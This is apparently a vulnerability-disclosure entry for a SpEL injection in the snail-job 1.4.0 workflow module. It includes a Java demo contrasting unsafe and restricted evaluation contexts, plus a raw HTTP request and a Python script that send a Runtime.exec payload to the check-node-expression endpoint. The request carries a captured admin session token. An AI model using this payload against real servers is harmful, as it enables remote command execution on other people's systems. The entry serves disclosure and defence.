| Title | gitee/github snail-job 1.4.0 Command Injection |
|---|
| Description | ## Summary
This vulnerability is a SpEL (Spring Expression Language) expression injection. An authenticated user can exploit it by entering a malicious SpEL expression in the condition expression field when creating a decision node in the Workflow-Task Management module. When the server validates that condition expression (the `/snail-job/workflow/check-node-expression` endpoint used in the PoC below), it evaluates the untrusted string with the SpEL engine, so a type reference such as `T(java.lang.Runtime).getRuntime().exec(...)` runs an arbitrary OS command on the server, i.e. remote code execution.
## PoC
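The pattern behind this finding, shown as an added illustration that is not snail-job's own code: evaluating a user-supplied SpEL string under Spring's `StandardEvaluationContext` exposes `T()` type references, constructors and arbitrary method calls, which is exactly what the PoC payload relies on, while `SimpleEvaluationContext` rejects those constructs at evaluation time. The variable names (`retryCount`, `status`), their sample values and the class/method names are assumptions made for the demo; the malicious string is the payload from the report.

```java
import java.util.Map;

import org.springframework.expression.EvaluationException;
import org.springframework.expression.Expression;
import org.springframework.expression.ExpressionParser;
import org.springframework.expression.ParseException;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.expression.spel.support.SimpleEvaluationContext;
import org.springframework.expression.spel.support.StandardEvaluationContext;

/**
 * Demo only (not snail-job code): the unsafe SpEL evaluation pattern beside a restricted one.
 * Requires spring-expression on the classpath.
 */
public class NodeExpressionCheckDemo {

    private static final ExpressionParser PARSER = new SpelExpressionParser();

    // Constructed sample of the kind of variables a workflow decision node might see.
    private static final Map<String, Object> SAMPLE_VARIABLES =
            Map.of("retryCount", 5, "status", "FAILED");

    /**
     * Unsafe: StandardEvaluationContext supports T(type) references, constructors,
     * bean references and method calls on any class, so untrusted input becomes code.
     */
    static Object evaluateUnsafe(String nodeExpression) {
        StandardEvaluationContext ctx = new StandardEvaluationContext();
        SAMPLE_VARIABLES.forEach(ctx::setVariable);
        return PARSER.parseExpression(nodeExpression).getValue(ctx);
    }

    /**
     * Restricted: SimpleEvaluationContext only allows reading variables/properties.
     * T(...), constructors and method invocation raise an EvaluationException instead of executing.
     */
    static Boolean evaluateRestricted(String nodeExpression) {
        SimpleEvaluationContext ctx = SimpleEvaluationContext.forReadOnlyDataBinding().build();
        SAMPLE_VARIABLES.forEach(ctx::setVariable);
        Expression expr = PARSER.parseExpression(nodeExpression);
        return expr.getValue(ctx, Boolean.class);
    }

    /**
     * Syntax-only validation: parsing never evaluates the expression, so a
     * "check expression" endpoint that only needs to confirm syntax can stop here.
     */
    static boolean isSyntacticallyValid(String nodeExpression) {
        try {
            PARSER.parseExpression(nodeExpression);
            return true;
        } catch (ParseException e) {
            return false;
        }
    }

    public static void main(String[] args) {
        String legit = "#retryCount > 3 and #status == 'FAILED'";
        String malicious = "T(java.lang.Runtime).getRuntime().exec(\"calc\")";

        System.out.println("syntax ok (legit):     " + isSyntacticallyValid(legit));
        System.out.println("syntax ok (malicious): " + isSyntacticallyValid(malicious)); // true: syntax says nothing about safety
        System.out.println("restricted (legit):    " + evaluateRestricted(legit));      // true

        try {
            evaluateRestricted(malicious);
            System.out.println("restricted (malicious): evaluated, which should not happen");
        } catch (EvaluationException e) {
            System.out.println("restricted (malicious): rejected: " + e.getMessage());
        }

        // evaluateUnsafe(malicious) would actually spawn the process; deliberately not called here.
    }
}
```

Note that `isSyntacticallyValid` accepts the malicious payload: it is well-formed SpEL. The defence is in which evaluation context the expression is later run under, not in parsing, so the validation endpoint and the workflow engine both need the restricted context (or an allow-listed expression language) for the fix to hold.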
```
POST /snail-job/workflow/check-node-expression HTTP/1.1
Host: 127.0.0.1:8888
Content-Length: 129
X-Request-Id: Zjn6GKOLVAYMyyFyIdwpH
sec-ch-ua-platform: "Windows"
Accept-Language: zh-CN,zh;q=0.9
sec-ch-ua: "Chromium";v="133", "Not(A:Brand";v="99"
timeout: 6000
sec-ch-ua-mobile: ?0
SNAIL-JOB-AUTH: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3NDE4MzM5NzMsImF1ZCI6IntcImlkXCI6MSxcInVzZXJuYW1lXCI6XCJhZG1pblwiLFwicm9sZVwiOjIsXCJjcmVhdGVEdFwiOlwiMjAyNS0wMy0xMiAxMDo0MDo0N1wiLFwidXBkYXRlRHRcIjpcIjIwMjUtMDMtMTIgMTA6NDA6NDdcIn0ifQ.vx9EcFK-R150Z6fr2uEI6awuyUAoHGRdT7ip4lxBf1o
SNAIL-JOB-NAMESPACE-ID: 764d604ec6fc45f68cd92514c40e9e1a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Accept: application/json, text/plain, */*
Content-Type: application/json
Origin: http://127.0.0.1:8888
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8888/snail-job/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

{"expressionType":3,"logicalCondition":1,"defaultDecision":0,"nodeExpression":"T(java.lang.Runtime).getRuntime().exec(\"calc\")"}
```
Python code (same request as above, sent with `requests`)
```
import requests

# Validation endpoint that evaluates the submitted SpEL expression.
url = "http://127.0.0.1:8888/snail-job/workflow/check-node-expression"

# Headers copied from the browser session. SNAIL-JOB-AUTH is the session JWT
# and SNAIL-JOB-NAMESPACE-ID the namespace of the logged-in user; the
# remaining headers reproduce the browser request and are not part of the bug.
headers = {
"Host": "127.0.0.1:8888",
"X-Request-Id": "Zjn6GKOLVAYMyyFyIdwpH",
"sec-ch-ua-platform": "\"Windows\"",
"Accept-Language": "zh-CN,zh;q=0.9",
"sec-ch-ua": "\"Chromium\";v=\"133\", \"Not(A:Brand\";v=\"99\"",
"timeout": "6000",
"sec-ch-ua-mobile": "?0",
"SNAIL-JOB-AUTH": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3NDE4MzM5NzMsImF1ZCI6IntcImlkXCI6MSxcInVzZXJuYW1lXCI6XCJhZG1pblwiLFwicm9sZVwiOjIsXCJjcmVhdGVEdFwiOlwiMjAyNS0wMy0xMiAxMDo0MDo0N1wiLFwidXBkYXRlRHRcIjpcIjIwMjUtMDMtMTIgMTA6NDA6NDdcIn0ifQ.vx9EcFK-R150Z6fr2uEI6awuyUAoHGRdT7ip4lxBf1o",
"SNAIL-JOB-NAMESPACE-ID": "764d604ec6fc45f68cd92514c40e9e1a",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36",
"Accept": "application/json, text/plain, */*",
"Content-Type": "application/json",
"Origin": "http://127.0.0.1:8888",
"Sec-Fetch-Site": "same-origin",
"Sec-Fetch-Mode": "cors",
"Sec-Fetch-Dest": "empty",
"Referer": "http://127.0.0.1:8888/snail-job/",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive"
}

# Decision-node payload. nodeExpression is the injected SpEL: a T() type
# reference that calls Runtime.exec(), here launching calc on a Windows host.
data = {
"expressionType": 3,
"logicalCondition": 1,
"defaultDecision": 0,
"nodeExpression": "T(java.lang.Runtime).getRuntime().exec(\"calc\")"
}

response = requests.post(url, headers=headers, json=data)
print("Status Code:", response.status_code)
print("Response Body:", response.text)
```
## Impact
snail-job version <1.4.0 |
|---|
| Source | https://gitee.com/aizuda/snail-job/issues/IBSQ24 |
|---|
| User | startr4ck (UID 76213) |
|---|
| Submission | 03/12/2025 05:27 (1 Year ago) |
|---|
| Moderation | 03/21/2025 21:31 (10 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 300624 [aizuda snail-job 1.4.0 Workflow-Task Management check-node-expression getRuntime nodeExpression deserialization] |
|---|
| Points | 20 |
|---|